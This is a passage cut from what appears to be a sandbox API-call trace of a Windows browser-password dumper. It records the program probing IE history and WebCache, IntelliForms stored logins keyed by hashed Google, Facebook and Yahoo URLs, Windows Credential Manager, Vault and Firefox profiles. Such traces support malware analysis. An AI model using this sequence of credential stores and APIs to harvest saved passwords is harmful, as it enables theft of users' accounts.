_Dest=0x19f560, _Source="LoadPasswordsYandex" | out: _Dest="/LoadPasswordsYandex") returned="/LoadPasswordsYandex" [0251.611] _wcsicmp (_String1="/LoadPasswordsYandex", _String2="/scomma") returned -7 [0251.611] _wcsicmp (_String1="/LoadPasswordsYandex", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: _Dest=0x19f560, _Source="UseFirefoxProfileFolder" | out: _Dest="/UseFirefoxProfileFolder") returned="/UseFirefoxProfileFolder" [0251.611] _wcsicmp (_String1="/UseFirefoxProfileFolder", _String2="/scomma") returned 2 [0251.611] _wcsicmp (_String1="/UseFirefoxProfileFolder", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: _Dest=0x19f560, _Source="UseFirefoxInstallFolder" | out: _Dest="/UseFirefoxInstallFolder") returned="/UseFirefoxInstallFolder" [0251.611] _wcsicmp (_String1="/UseFirefoxInstallFolder", _String2="/scomma") returned 2 [0251.611] _wcsicmp (_String1="/UseFirefoxInstallFolder", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: _Dest=0x19f560, _Source="UseChromeProfileFolder" | out: _Dest="/UseChromeProfileFolder") returned="/UseChromeProfileFolder" [0251.611] _wcsicmp (_String1="/UseChromeProfileFolder", _String2="/scomma") returned 2 [0251.611] _wcsicmp (_String1="/UseChromeProfileFolder", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: _Dest=0x19f560, _Source="UseOperaPasswordFile" | out: _Dest="/UseOperaPasswordFile") returned="/UseOperaPasswordFile" [0251.611] _wcsicmp (_String1="/UseOperaPasswordFile", _String2="/scomma") returned 2 [0251.611] _wcsicmp (_String1="/UseOperaPasswordFile", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: _Dest=0x19f55c, _Source="FirefoxProfileFolder" | out: _Dest="/FirefoxProfileFolder") returned="/FirefoxProfileFolder" [0251.611] _wcsicmp (_String1="/FirefoxProfileFolder", _String2="/scomma") returned -13 [0251.611] _wcsicmp (_String1="/FirefoxProfileFolder", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: _Dest=0x19f55c, _Source="FirefoxInstallFolder" | out: _Dest="/FirefoxInstallFolder") returned="/FirefoxInstallFolder" [0251.611] _wcsicmp (_String1="/FirefoxInstallFolder", _String2="/scomma") returned -13 [0251.611] _wcsicmp (_String1="/FirefoxInstallFolder", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: _Dest=0x19f55c, _Source="ChromeProfileFolder" | out: _Dest="/ChromeProfileFolder") returned="/ChromeProfileFolder" [0251.611] _wcsicmp (_String1="/ChromeProfileFolder", _String2="/scomma") returned -16 [0251.612] _wcsicmp (_String1="/ChromeProfileFolder", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.612] wcscat (in: _Dest=0x19f55c, _Source="OperaPasswordFile" | out: _Dest="/OperaPasswordFile") returned="/OperaPasswordFile" [0251.612] _wcsicmp (_String1="/OperaPasswordFile", _String2="/scomma") returned -4 [0251.612] _wcsicmp (_String1="/OperaPasswordFile", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.612] wcscat (in: _Dest=0x19f560, _Source="SaveFileEncoeding" | out: _Dest="/SaveFileEncoeding") returned="/SaveFileEncoeding" [0251.612] _wcsicmp (_String1="/SaveFileEncoeding", _String2="/scomma") returned -2 [0251.612] _wcsicmp (_String1="/SaveFileEncoeding", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.612] _wcsicmp (_String1="/sort", _String2="/scomma") returned 12 [0251.612] _wcsicmp (_String1="/sort", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.612] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0251.612] SetCursor (hCursor=0x10007) returned 0x10007 [0251.612] GetVersionExW (in: lpVersionInformation=0x452e08*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x452e08*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0251.612] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19aa80, csidl=34, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0251.828] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.828] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.828] wcslen (_String="*.*") returned 0x3 [0251.828] wcscpy (in: _Dest=0x19a07c, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History" [0251.828] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.828] wcscat (in: _Dest=0x19a07c, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\" [0251.828] wcscat (in: _Dest=0x19a07c, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\*.*" [0251.828] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\*.*", lpFindFileData=0x19a304 | out: lpFindFileData=0x19a304) returned 0x5ff058 [0251.828] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.828] wcslen (_String=".") returned 0x1 [0251.828] wcscpy (in: _Dest=0x19a554, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History" [0251.828] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.828] wcscat (in: _Dest=0x19a554, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\" [0251.828] wcscat (in: _Dest=0x19a554, _Source="." | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\.") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\." [0251.828] wcscmp (_String1=".", _String2="..") returned -1 [0251.828] wcscmp (_String1=".", _String2=".") returned 0 [0251.828] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0251.828] FindNextFileW (in: hFindFile=0x5ff058, lpFindFileData=0x19a304 | out: lpFindFileData=0x19a304) returned 1 [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.829] wcslen (_String="..") returned 0x2 [0251.829] wcscpy (in: _Dest=0x19a554, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History" [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.829] wcscat (in: _Dest=0x19a554, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\" [0251.829] wcscat (in: _Dest=0x19a554, _Source=".." | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\..") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\.." [0251.829] wcscmp (_String1="..", _String2="..") returned 0 [0251.829] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0251.829] FindNextFileW (in: hFindFile=0x5ff058, lpFindFileData=0x19a304 | out: lpFindFileData=0x19a304) returned 1 [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.829] wcslen (_String="History.IE5") returned 0xb [0251.829] wcscpy (in: _Dest=0x19a554, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History" [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x50 [0251.829] wcscat (in: _Dest=0x19a554, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\" [0251.829] wcscat (in: _Dest=0x19a554, _Source="History.IE5" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0251.829] wcscmp (_String1="History.IE5", _String2="..") returned 1 [0251.829] wcscmp (_String1="History.IE5", _String2=".") returned 1 [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x5c [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x5c [0251.829] wcslen (_String="*.*") returned 0x3 [0251.829] wcscpy (in: _Dest=0x199680, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x5c [0251.829] wcscat (in: _Dest=0x199680, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0251.829] wcscat (in: _Dest=0x199680, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*" [0251.829] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*", lpFindFileData=0x199908 | out: lpFindFileData=0x199908) returned 0x5ff518 [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x5c [0251.829] wcslen (_String=".") returned 0x1 [0251.829] wcscpy (in: _Dest=0x199b58, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0251.829] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x5c [0251.829] wcscat (in: _Dest=0x199b58, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0251.829] wcscat (in: _Dest=0x199b58, _Source="." | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\.") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\." [0251.829] wcscmp (_String1=".", _String2="..") returned -1 [0251.829] wcscmp (_String1=".", _String2=".") returned 0 [0251.830] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0251.830] FindNextFileW (in: hFindFile=0x5ff518, lpFindFileData=0x199908 | out: lpFindFileData=0x199908) returned 1 [0251.830] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x5c [0251.830] wcslen (_String="..") returned 0x2 [0251.830] wcscpy (in: _Dest=0x199b58, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0251.830] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x5c [0251.830] wcscat (in: _Dest=0x199b58, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0251.830] wcscat (in: _Dest=0x199b58, _Source=".." | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\..") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\.." [0251.830] wcscmp (_String1="..", _String2="..") returned 0 [0251.830] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0251.830] FindNextFileW (in: hFindFile=0x5ff518, lpFindFileData=0x199908 | out: lpFindFileData=0x199908) returned 0 [0251.830] FindClose (in: hFindFile=0x5ff518 | out: hFindFile=0x5ff518) returned 1 [0251.830] FindNextFileW (in: hFindFile=0x5ff058, lpFindFileData=0x19a304 | out: lpFindFileData=0x19a304) returned 0 [0251.830] FindClose (in: hFindFile=0x5ff058 | out: hFindFile=0x5ff058) returned 1 [0251.830] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19a644, csidl=28, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1 [0251.835] wcslen (_String="Microsoft\\Windows\\WebCache\\WebCacheV01.dat") returned 0x2a [0251.835] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0251.835] wcscpy (in: _Dest=0x19a854, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" [0251.835] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0251.835] wcscat (in: _Dest=0x19a854, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\" [0251.835] wcscat (in: _Dest=0x19a854, _Source="Microsoft\\Windows\\WebCache\\WebCacheV01.dat" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" [0251.836] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")) returned 0xffffffff [0251.836] wcslen (_String="Microsoft\\Windows\\WebCache\\WebCacheV24.dat") returned 0x2a [0251.836] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0251.836] wcscpy (in: _Dest=0x19a854, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" [0251.836] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0251.836] wcscat (in: _Dest=0x19a854, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\" [0251.836] wcscat (in: _Dest=0x19a854, _Source="Microsoft\\Windows\\WebCache\\WebCacheV24.dat" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat" [0251.836] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\webcache\\webcachev24.dat")) returned 0xffffffff [0251.836] FindFirstUrlCacheEntryW (in: lpszUrlSearchPattern="visited:", lpFirstCacheEntryInfo=0xccce78, lpcbCacheEntryInfo=0x19acac | out: lpFirstCacheEntryInfo=0xccce78, lpcbCacheEntryInfo=0x19acac) returned 0x0 [0252.205] wcslen (_String="https://www.google.com/accounts/servicelogin") returned 0x2c [0252.205] wcscmp (_String1="http://www.facebook.com/", _String2="https://www.google.com/accounts/servicelogin") returned -1 [0252.205] wcslen (_String="http://www.facebook.com/") returned 0x18 [0252.205] wcscmp (_String1="https://login.yahoo.com/config/login", _String2="http://www.facebook.com/") returned 1 [0252.205] wcscmp (_String1="https://login.yahoo.com/config/login", _String2="https://www.google.com/accounts/servicelogin") returned -1 [0252.205] wcslen (_String="https://login.yahoo.com/config/login") returned 0x24 [0252.205] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19aca0 | out: phkResult=0x19aca0*=0x0) returned 0x2 [0252.205] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0252.205] GetProcAddress (hModule=0x760f0000, lpProcName="CryptAcquireContextA") returned 0x76110c00 [0252.205] GetProcAddress (hModule=0x760f0000, lpProcName="CryptReleaseContext") returned 0x76110ad0 [0252.205] GetProcAddress (hModule=0x760f0000, lpProcName="CryptCreateHash") returned 0x7610f930 [0252.205] GetProcAddress (hModule=0x760f0000, lpProcName="CryptGetHashParam") returned 0x7610f530 [0252.206] GetProcAddress (hModule=0x760f0000, lpProcName="CryptHashData") returned 0x7610f950 [0252.206] GetProcAddress (hModule=0x760f0000, lpProcName="CryptDestroyHash") returned 0x7610fbf0 [0252.206] CryptAcquireContextA (in: phProv=0x19bcc8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19bcc8*=0x607c50) returned 1 [0252.211] wcslen (_String="https://www.google.com/accounts/servicelogin") returned 0x2c [0252.211] _wcslwr (in: _String="https://www.google.com/accounts/servicelogin" | out: _String="https://www.google.com/accounts/servicelogin") returned="https://www.google.com/accounts/servicelogin" [0252.211] CryptCreateHash (in: hProv=0x607c50, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x19aca0 | out: phHash=0x19aca0) returned 1 [0252.211] wcslen (_String="https://www.google.com/accounts/servicelogin") returned 0x2c [0252.211] CryptHashData (hHash=0x5ff298, pbData=0x19acc0, dwDataLen=0x5a, dwFlags=0x0) returned 1 [0252.211] CryptGetHashParam (in: hHash=0x5ff298, dwParam=0x2, pbData=0x19ac84, pdwDataLen=0x19ac9c, dwFlags=0x0 | out: pbData=0x19ac84, pdwDataLen=0x19ac9c) returned 1 [0252.211] CryptDestroyHash (hHash=0x5ff298) returned 1 [0252.211] wcslen (_String="https://www.google.com/accounts/servicelogin") returned 0x2c [0252.211] CryptCreateHash (in: hProv=0x607c50, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x19aca0 | out: phHash=0x19aca0) returned 1 [0252.211] wcslen (_String="https://www.google.com/accounts/servicelogin/") returned 0x2d [0252.211] CryptHashData (hHash=0x5ff1d8, pbData=0x19acc0, dwDataLen=0x5c, dwFlags=0x0) returned 1 [0252.211] CryptGetHashParam (in: hHash=0x5ff1d8, dwParam=0x2, pbData=0x19ac84, pdwDataLen=0x19ac9c, dwFlags=0x0 | out: pbData=0x19ac84, pdwDataLen=0x19ac9c) returned 1 [0252.211] CryptDestroyHash (hHash=0x5ff1d8) returned 1 [0252.212] wcslen (_String="http://www.facebook.com/") returned 0x18 [0252.212] _wcslwr (in: _String="http://www.facebook.com/" | out: _String="http://www.facebook.com/") returned="http://www.facebook.com/" [0252.212] CryptCreateHash (in: hProv=0x607c50, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x19aca0 | out: phHash=0x19aca0) returned 1 [0252.212] wcslen (_String="http://www.facebook.com/") returned 0x18 [0252.212] CryptHashData (hHash=0x5fef98, pbData=0x19acc0, dwDataLen=0x32, dwFlags=0x0) returned 1 [0252.212] CryptGetHashParam (in: hHash=0x5fef98, dwParam=0x2, pbData=0x19ac84, pdwDataLen=0x19ac9c, dwFlags=0x0 | out: pbData=0x19ac84, pdwDataLen=0x19ac9c) returned 1 [0252.212] CryptDestroyHash (hHash=0x5fef98) returned 1 [0252.212] wcslen (_String="http://www.facebook.com/") returned 0x18 [0252.212] wcslen (_String="https://login.yahoo.com/config/login") returned 0x24 [0252.212] _wcslwr (in: _String="https://login.yahoo.com/config/login" | out: _String="https://login.yahoo.com/config/login") returned="https://login.yahoo.com/config/login" [0252.212] CryptCreateHash (in: hProv=0x607c50, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x19aca0 | out: phHash=0x19aca0) returned 1 [0252.212] wcslen (_String="https://login.yahoo.com/config/login") returned 0x24 [0252.212] CryptHashData (hHash=0x5ff1d8, pbData=0x19acc0, dwDataLen=0x4a, dwFlags=0x0) returned 1 [0252.212] CryptGetHashParam (in: hHash=0x5ff1d8, dwParam=0x2, pbData=0x19ac84, pdwDataLen=0x19ac9c, dwFlags=0x0 | out: pbData=0x19ac84, pdwDataLen=0x19ac9c) returned 1 [0252.212] CryptDestroyHash (hHash=0x5ff1d8) returned 1 [0252.212] wcslen (_String="https://login.yahoo.com/config/login") returned 0x24 [0252.212] CryptCreateHash (in: hProv=0x607c50, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x19aca0 | out: phHash=0x19aca0) returned 1 [0252.212] wcslen (_String="https://login.yahoo.com/config/login/") returned 0x25 [0252.212] CryptHashData (hHash=0x5ff258, pbData=0x19acc0, dwDataLen=0x4c, dwFlags=0x0) returned 1 [0252.212] CryptGetHashParam (in: hHash=0x5ff258, dwParam=0x2, pbData=0x19ac84, pdwDataLen=0x19ac9c, dwFlags=0x0 | out: pbData=0x19ac84, pdwDataLen=0x19ac9c) returned 1 [0252.212] CryptDestroyHash (hHash=0x5ff258) returned 1 [0252.212] CryptReleaseContext (hProv=0x607c50, dwFlags=0x0) returned 1 [0252.212] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0252.212] GetProcAddress (hModule=0x760f0000, lpProcName="CredReadA") returned 0x761258f0 [0252.212] GetProcAddress (hModule=0x760f0000, lpProcName="CredFree") returned 0x76114010 [0252.212] GetProcAddress (hModule=0x760f0000, lpProcName="CredDeleteA") returned 0x761256b0 [0252.213] GetProcAddress (hModule=0x760f0000, lpProcName="CredEnumerateA") returned 0x76125710 [0252.213] GetProcAddress (hModule=0x760f0000, lpProcName="CredEnumerateW") returned 0x76113950 [0252.213] CredEnumerateW (in: Filter=0x0, Flags=0x0, Count=0x19bcbc, Credential=0x19bcc0 | out: Count=0x19bcbc, Credential=0x19bcc0) returned 0 [0252.288] FreeLibrary (hLibModule=0x760f0000) returned 1 [0252.288] LoadLibraryW (lpLibFileName="pstorec.dll") returned 0x73810000 [0252.311] GetProcAddress (hModule=0x73810000, lpProcName="PStoreCreateInstance") returned 0x73811290 [0252.311] PStoreCreateInstance () returned 0x80004001 [0252.311] FreeLibrary (hLibModule=0x73810000) returned 1 [0252.311] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x737c0000 [0254.579] GetProcAddress (hModule=0x737c0000, lpProcName="VaultOpenVault") returned 0x737c9e10 [0254.580] GetProcAddress (hModule=0x737c0000, lpProcName="VaultCloseVault") returned 0x737c9e80 [0254.580] GetProcAddress (hModule=0x737c0000, lpProcName="VaultEnumerateItems") returned 0x737c9c80 [0254.580] GetProcAddress (hModule=0x737c0000, lpProcName="VaultFree") returned 0x737c9690 [0254.580] GetProcAddress (hModule=0x737c0000, lpProcName="VaultGetInformation") returned 0x737db9a0 [0254.580] GetProcAddress (hModule=0x737c0000, lpProcName="VaultGetItem") returned 0x737c9bf0 [0254.580] GetProcAddress (hModule=0x737c0000, lpProcName="VaultGetItem") returned 0x737c9bf0 [0254.580] VaultOpenVault () returned 0x0 [0254.889] VaultEnumerateItems () returned 0x0 [0254.889] VaultFree () returned 0x737c9690 [0254.889] VaultCloseVault () returned 0x6 [0254.890] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19b614, csidl=26, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1 [0254.906] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0254.906] wcscat (in: _Dest=0x19b614, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0254.907] wcscat (in: _Dest=0x19b614, _Source="Mozilla\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles" [0254.907] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19b820, csidl=26, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1 [0254.907] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0254.907] wcscat (in: _Dest=0x19b820, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0254.907] wcscat (in: _Dest=0x19b820, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0254.907] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles") returned 0x49 [0254.907] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles") returned 0x49 [0254.907] wcslen (_String="*.*") returned 0x3 [0254.907] wcscpy (in: _Dest=0x19ac0c, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles" [0254.907] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles") returned 0x49 [0254.907] wcscat (in: _Dest=0x19ac0c, _Source="\\" | out: 